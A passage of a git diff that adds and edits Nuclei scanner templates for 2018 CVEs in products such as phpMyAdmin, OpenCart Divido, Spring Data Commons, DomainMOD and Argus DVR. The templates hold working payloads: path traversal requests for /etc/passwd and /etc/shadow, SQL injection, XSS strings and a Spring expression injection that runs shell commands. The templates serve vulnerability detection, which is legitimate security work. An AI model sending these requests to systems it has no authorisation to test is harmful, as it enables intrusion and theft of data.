+ - https://access.redhat.com/errata/RHSA-2018:2669
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.10
+ cvss-score: 8.1
cve-id: CVE-2018-1000130
cwe-id: CWE-74
- reference:
- - https://jolokia.org/#Security_fixes_with_1.5.0
- - https://access.redhat.com/errata/RHSA-2018:2669
+ tags: cve,cve2018,jolokia,rce,jndi,proxy
requests:
- raw:
diff --git a/poc/cve/cve-2018-10956.yaml b/poc/cve/cve-2018-10956.yaml
index 89b1bbae56..dd4b86b2af 100644
--- a/poc/cve/cve-2018-10956.yaml
+++ b/poc/cve/cve-2018-10956.yaml
@@ -1,5 +1,5 @@
-
id: CVE-2018-10956
+
info:
name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal.
author: 0x_Akoko
@@ -7,26 +7,29 @@ info:
description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal.
reference:
- https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
+ - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
- https://www.cvedetails.com/cve/CVE-2018-10956
+ - https://www.exploit-db.com/exploits/44916/
classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-10956
cwe-id: CWE-22
- tags: cve,cve2018,Orchid,vms,lfi
-
+ metadata:
+ shodan-query: http.title:"Orchid Core VMS"
+ tags: cve,cve2018,orchid,vms,lfi
+
requests:
- method: GET
path:
- - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/shadow"
+ - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"
+
matchers-condition: and
matchers:
- - type: word
- words:
- - "root:*:"
- - "bin:*:"
- condition: and
- part: body
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
- type: status
status:
- 200
diff --git a/poc/cve/cve-2018-11231.yaml b/poc/cve/cve-2018-11231.yaml
index 9412a5f837..0245c2a8a3 100644
--- a/poc/cve/cve-2018-11231.yaml
+++ b/poc/cve/cve-2018-11231.yaml
@@ -1,38 +1,56 @@
id: CVE-2018-11231
+
info:
name: Opencart Divido - Sql Injection
author: ritikchaddha
severity: high
description: |
OpenCart Divido plugin is susceptible to SQL injection
+ impact: |
+ This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system.
+ remediation: |
+ Apply the official patch or upgrade to a version that includes the fix.
reference:
- - http://foreversong.cn/archives/1183
+ - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183
- https://nvd.nist.gov/vuln/detail/CVE-2018-11231
+ - http://foreversong.cn/archives/1183
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.10
+ cvss-score: 8.1
cve-id: CVE-2018-11231
cwe-id: CWE-89
- tags: cve,cve2018,opencart,sqli
+ epss-score: 0.00903
+ epss-percentile: 0.82368
+ cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:*
+ metadata:
+ max-request: 1
+ vendor: divido
+ product: divido
+ framework: opencart
+ tags: cve,cve2018,opencart,sqli,intrusive,divido
variables:
num: "999999999"
-requests:
+
+http:
- raw:
- |
POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
Host: {{Hostname}}
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2}
- redirects: true
+
+ host-redirects: true
max-redirects: 2
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- - '{{md5({{num}})}}'
+ - "{{md5({{num}})}}"
+
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/06/19
+# digest: 4b0a0048304602210094fdc034027036f675331a436c8d9717e75ce79fc7a19d05b65af74381436044022100f81d99821fdfe5caea01c0c541569fd07dd78ac1522bbf7146f0a3b802ac09e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2018-12054.yaml b/poc/cve/cve-2018-12054.yaml
index 7c0f78a175..99e0202257 100644
--- a/poc/cve/cve-2018-12054.yaml
+++ b/poc/cve/cve-2018-12054.yaml
@@ -4,16 +4,18 @@ info:
name: Schools Alert Management Script - Arbitrary File Read
author: wisnupramoedya
severity: high
- description: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.
+ description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
reference:
- https://www.exploit-db.com/exploits/44874
- - https://www.cvedetails.com/cve/CVE-2018-12054
- tags: cve,cve2018,lfi
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-12054
+ - https://github.com/unh3x/just4cve/issues/4
+ - https://www.exploit-db.com/exploits/44874/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2018-12054
cwe-id: CWE-22
+ tags: cve,cve2018,lfi
requests:
- method: GET
@@ -30,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/04/26
diff --git a/poc/cve/cve-2018-12095.yaml b/poc/cve/cve-2018-12095.yaml
new file mode 100644
index 0000000000..cd09108f78
--- /dev/null
+++ b/poc/cve/cve-2018-12095.yaml
@@ -0,0 +1,38 @@
+id: CVE-2018-12095
+
+info:
+ name: OEcms 3.1 - Cross-Site Scripting
+ author: LogicalHunter
+ severity: medium
+ description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.
+ reference:
+ - https://www.exploit-db.com/exploits/44895
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
+ - https://cxsecurity.com/issue/WLB-2018060092
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2018-12095
+ cwe-id: CWE-79
+ tags: cve,cve2018,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2018-12613.yaml b/poc/cve/cve-2018-12613.yaml
new file mode 100644
index 0000000000..9b58a055d2
--- /dev/null
+++ b/poc/cve/cve-2018-12613.yaml
@@ -0,0 +1,35 @@
+id: CVE-2018-12613
+
+info:
+ name: PhpMyAdmin 4.8.1 Remote File Inclusion
+ author: pikpikcu
+ severity: high
+ description: An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
+ - https://www.phpmyadmin.net/security/PMASA-2018-4/
+ - https://www.exploit-db.com/exploits/44928/
+ - http://www.securityfocus.com/bid/104532
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2018-12613
+ cwe-id: CWE-287
+ tags: cve,cve2018,phpmyadmin,lfi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2018-1273.yaml b/poc/cve/cve-2018-1273.yaml
index 21e4b73c22..50db2cdc93 100644
--- a/poc/cve/cve-2018-1273.yaml
+++ b/poc/cve/cve-2018-1273.yaml
@@ -1,7 +1,7 @@
id: CVE-2018-1273
info:
- name: Spring Data Commons Unauthenticated RCE
+ name: Spring Data Commons - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
@@ -10,25 +10,39 @@ info:
caused by improper neutralization of special elements.
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
- or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.
+ or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-1273
+ - https://pivotal.io/security/cve-2018-1273
+ - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-1273
+ cwe-id: CWE-20
+ tags: cve,cve2018,vmware,rce,spring
requests:
- - payloads:
- command:
- - "cat /etc/passwd"
- - "type C:\\/Windows\\/win.ini"
- raw:
+ - raw:
- |
POST /account HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Type: application/x-www-form-urlencoded
- name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei
+ name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]=nuclei
+
+ payloads:
+ command:
+ - "cat /etc/passwd"
+ - "type C:\\/Windows\\/win.ini"
+
matchers:
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
+
+# Enhanced by mp on 2022/05/12
diff --git a/poc/cve/cve-2018-13380.yaml b/poc/cve/cve-2018-13380.yaml
index 36d649a0b8..be4ef26f42 100644
--- a/poc/cve/cve-2018-13380.yaml
+++ b/poc/cve/cve-2018-13380.yaml
@@ -5,6 +5,8 @@ info:
author: shelld3v,AaronChen0
severity: medium
description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patches or updates provided by Fortinet to fix this vulnerability.
reference:
@@ -12,13 +14,14 @@ info:
- https://fortiguard.com/advisory/FG-IR-18-383
- https://fortiguard.com/advisory/FG-IR-20-230
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
+ - https://github.com/merlinepedra25/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-13380
cwe-id: CWE-79
epss-score: 0.00122
- epss-percentile: 0.46323
+ epss-percentile: 0.46406
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -50,4 +53,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206ab225b4705ce3db314b245cfec6e012e94044d4209e5df98d39f0a05fa1bc53022100c21d77f5146d53ad87432f5f0963b8b27d95638346522784c2327e51af5fa17a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2018-14931.yaml b/poc/cve/cve-2018-14931.yaml
new file mode 100644
index 0000000000..babdd309c5
--- /dev/null
+++ b/poc/cve/cve-2018-14931.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-14931
+
+info:
+ name: Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.
+ reference:
+ - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html
+ - https://www.cvedetails.com/cve/CVE-2018-14931
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2018-14931
+ cwe-id: CWE-601
+ tags: cve,cve2018,redirect,polarisft,intellect
+
+requests:
+ - method: GET
+
+ path:
+ - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/04/26
diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml
index 2392e8714b..e2eabe600d 100644
--- a/poc/cve/cve-2018-15473.yaml
+++ b/poc/cve/cve-2018-15473.yaml
@@ -1,28 +1,28 @@
id: CVE-2018-15473
+
info:
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2018-15473
- - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
- - https://bugs.debian.org/906236
- - http://www.openwall.com/lists/oss-security/2018/08/15/5
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.3
+ cvss-score: 5.30
cve-id: CVE-2018-15473
cwe-id: CWE-362
- tags: network,openssh,cve,cve2018
+
+
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
+
matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'
+
extractors:
- type: regex
regex:
diff --git a/poc/cve/cve-2018-15745.yaml b/poc/cve/cve-2018-15745.yaml
new file mode 100644
index 0000000000..d271e88968
--- /dev/null
+++ b/poc/cve/cve-2018-15745.yaml
@@ -0,0 +1,35 @@
+id: CVE-2018-15745
+
+info:
+ name: Argus Surveillance DVR - Directory Traversal
+ author: gy741
+ severity: high
+ description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
+ reference:
+ - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
+ - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html
+ - https://www.exploit-db.com/exploits/45296/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2018-15745
+ cwe-id: CWE-22
+ tags: cve,cve2018,argussurveillance,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "for 16-bit app support"
+ - "[drivers]"
+ condition: and
diff --git a/poc/cve/cve-2018-16288.yaml b/poc/cve/cve-2018-16288.yaml
index d31045c5bb..e90a28a2aa 100644
--- a/poc/cve/cve-2018-16288.yaml
+++ b/poc/cve/cve-2018-16288.yaml
@@ -8,12 +8,14 @@ info:
reference:
- https://www.exploit-db.com/exploits/45440
- https://www.cvedetails.com/cve/CVE-2018-16288
- tags: cve,cve2018,lfi
+ - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
+ - https://www.exploit-db.com/exploits/45440/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- cvss-score: 8.60
+ cvss-score: 8.6
cve-id: CVE-2018-16288
cwe-id: CWE-200
+ tags: cve,cve2018,lfi
requests:
- method: GET
diff --git a/poc/cve/cve-2018-18775.yaml b/poc/cve/cve-2018-18775.yaml
new file mode 100644
index 0000000000..c20b618642
--- /dev/null
+++ b/poc/cve/cve-2018-18775.yaml
@@ -0,0 +1,37 @@
+id: CVE-2018-18775
+
+info:
+ name: Cross Site Scripting in Microstrategy Web version 7
+ author: 0x_Akoko
+ severity: medium
+ description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter
+ reference:
+ - https://www.exploit-db.com/exploits/45755
+ - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
+ - https://www.exploit-db.com/exploits/45755/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2018-18775
+ cwe-id: CWE-79
+ tags: cve,cve2018,microstrategy,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C'
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '">'
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/poc/cve/cve-2018-18777.yaml b/poc/cve/cve-2018-18777.yaml
index ca48a4b0e2..cf30bb7307 100644
--- a/poc/cve/cve-2018-18777.yaml
+++ b/poc/cve/cve-2018-18777.yaml
@@ -3,9 +3,21 @@ id: CVE-2018-18777
info:
name: Path traversal vulnerability in Microstrategy Web version 7
author: 0x_Akoko
- severity: high
- reference: https://www.exploit-db.com/exploits/45755
- tags: microstrategy,lfi
+ severity: medium
+ description: |
+ Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage)
+ allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /..
+ (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
+ reference:
+ - https://www.exploit-db.com/exploits/45755
+ - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
+ - https://www.exploit-db.com/exploits/45755/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2018-18777
+ cwe-id: CWE-22
+ tags: cve,cve2018,microstrategy,lfi,traversal
requests:
- method: GET
@@ -17,7 +29,7 @@ requests:
- type: regex
regex:
- - "root:[x*]:0:0"
+ - "root:.*:0:0:"
- type: status
status:
diff --git a/poc/cve/cve-2018-19877.yaml b/poc/cve/cve-2018-19877.yaml
new file mode 100644
index 0000000000..860a40a6b3
--- /dev/null
+++ b/poc/cve/cve-2018-19877.yaml
@@ -0,0 +1,53 @@
+id: CVE-2018-19877
+
+info:
+ name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Upgrade Adiscon LogAnalyzer to version 4.1.7 or later to mitigate this vulnerability.
+ reference:
+ - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
+ - https://www.exploit-db.com/exploits/45958/
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-19877
+ - https://github.com/ARPSyndicate/kenzer-templates
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2018-19877
+ cwe-id: CWE-79
+ epss-score: 0.00241
+ epss-percentile: 0.63554
+ cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: adiscon
+ product: loganalyzer
+ tags: cve,cve2018,adiscon,xss,edb
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'value="">'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a0047304502210085b48bbdf595b702ebec999f9e07ec650e2ca0276e09d9ab926467143c087d0d022063857749f628ad5e3d598a8e17fa18c4708545c2196caebf9b7505e171159d66:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2018-19892.yaml b/poc/cve/cve-2018-19892.yaml
index 81ee180a25..e957023784 100644
--- a/poc/cve/cve-2018-19892.yaml
+++ b/poc/cve/cve-2018-19892.yaml
@@ -5,20 +5,32 @@ info:
author: arafatansari
severity: medium
description: |
- DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
+ DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/45959
- https://github.com/domainmod/domainmod/issues/85
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-19892
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2018-19892
cwe-id: CWE-79
+ epss-score: 0.00101
+ epss-percentile: 0.40415
+ cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
metadata:
- verified: "true"
- tags: cve,cve2018,domainmod,xss,authenticated
+ verified: true
+ max-request: 3
+ vendor: domainmod
+ product: domainmod
+ tags: cve2018,cve,domainmod,xss,authenticated,edb
-requests:
+http:
- raw:
- |
POST / HTTP/1.1
@@ -26,21 +38,19 @@ requests:
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
-
- |
POST /admin/dw/add-server.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=
-
- |
GET /admin/dw/servers.php HTTP/1.1
Host: {{Hostname}}
- cookie-reuse: true
- redirects: true
+ host-redirects: true
max-redirects: 3
+
matchers-condition: and
matchers:
- type: word
@@ -56,3 +66,4 @@ requests:
- type: status
status:
- 200
+# digest: 4a0a0047304502201f24e9ecdde360ff34ab0c10a92f93fbbf91649ea9a2f0154e5cfb153518dd98022100fdae8217f56ff39de6d7e9c9e41db0001fb9c8ad1b336532ad1105c5fd39fa5a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2018-20011.yaml b/poc/cve/cve-2018-20011.yaml
index 03b42fdb8d..fe65c778d6 100644
--- a/poc/cve/cve-2018-20011.yaml
+++ b/poc/cve/cve-2018-20011.yaml
@@ -6,20 +6,31 @@ info:
severity: medium
description: |
DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/46374/
- https://github.com/domainmod/domainmod/issues/88
- https://nvd.nist.gov/vuln/detail/CVE-2018-20011
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2018-20011
cwe-id: CWE-79
+ epss-score: 0.00153
+ epss-percentile: 0.50703
+ cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
metadata:
verified: true
- tags: cve,cve1028,domainmod,xss,authenticated
+ max-request: 3
+ vendor: domainmod
+ product: domainmod
+ tags: cve2018,cve,domainmod,xss,authenticated,edb
-requests:
+http:
- raw:
- |
POST / HTTP/1.1
@@ -27,28 +38,23 @@ requests:
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
-
- |
POST /assets/add/category.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=
-
- |
GET /assets/categories.php HTTP/1.1
Host: {{Hostname}}
- cookie-reuse: true
- redirects: true
+ host-redirects: true
max-redirects: 2
- req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- - 'contains(all_headers_3, "text/html")'
+ - 'contains(header_3, "text/html")'
- 'contains(body_3, ">")'
condition: and
-
-# Enhanced by mp on 2022/08/10
+# digest: 490a0046304402206c740f13dea0b88d62e8f6cac876937c9522029b8222a3b548752237227d881b022033a65cc2e73acb43e2e310d063cef73c545e294c9587f18f385a32e4af343a46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2018-20470.yaml b/poc/cve/cve-2018-20470.yaml
new file mode 100644
index 0000000000..5d89cd2d44
--- /dev/null
+++ b/poc/cve/cve-2018-20470.yaml
@@ -0,0 +1,35 @@
+id: CVE-2018-20470
+
+info:
+ name: Sahi pro 7.x/8.x - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
+ reference:
+ - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
+ - https://www.cvedetails.com/cve/CVE-2018-20470
+ - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2018-20470
+ cwe-id: CWE-22
+ tags: cve,cve2018,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
diff --git a/poc/cve/cve-2018-20985.yaml b/poc/cve/cve-2018-20985.yaml
new file mode 100644
index 0000000000..71ed01c5b8
--- /dev/null
+++ b/poc/cve/cve-2018-20985.yaml
@@ -0,0 +1,39 @@
+id: CVE-2018-20985
+
+info:
+ name: WordPress Payeezy Pay <=2.97 - Local File Inclusion
+ author: daffainfo
+ severity: critical
+ description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
+ reference:
+ - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
+ - https://wordpress.org/plugins/wp-payeezy-pay/#developers
